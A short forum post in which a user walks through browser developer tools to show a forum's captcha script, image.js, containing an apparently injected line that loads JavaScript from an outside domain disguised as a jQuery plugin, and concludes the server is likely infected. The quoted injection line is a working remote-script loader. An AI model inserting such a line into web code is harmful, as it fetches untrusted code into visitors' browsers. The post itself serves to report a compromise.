I found something else interesting.
1) Right-click this page
2) Click "Inspect"
3) Click "Sources"
4) Browse the tree: top ->
www.opserver.de -> ubb7 -> ubb_js -> image.js?v=7.5.1p1
Look at the script:
/* Script Version 7.5.1 */
var image_pending = 0;
function newCaptcha(type) {
if (image_pending) return;
image_pending = 1;
get_object('ajax_wait').style.display = "";
var url = script + "?ubb=captcha&init=1&t=" + type;
var ajax = new ubbtAJAX(url, updateCaptcha);
ajax.sendData("GET");
}
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
function updateCaptcha(responseXML) {
id = responseXML;
obj = get_object('captcha_image');
obj.src = script + "?ubb=captcha&id=" + id;
image_pending = 0;
get_object('ajax_wait').style.display = "none";
}
This line does not look very nice. Was this line injected?
document.writeln("<script src=\'//om.qqtx.me/jquery.jscroll.min.js\'></script>");
Based on my experimentation, it appears this line loads the two suspicious scripts in the first place.
Hypothesis: The UBB.threads server is infected.
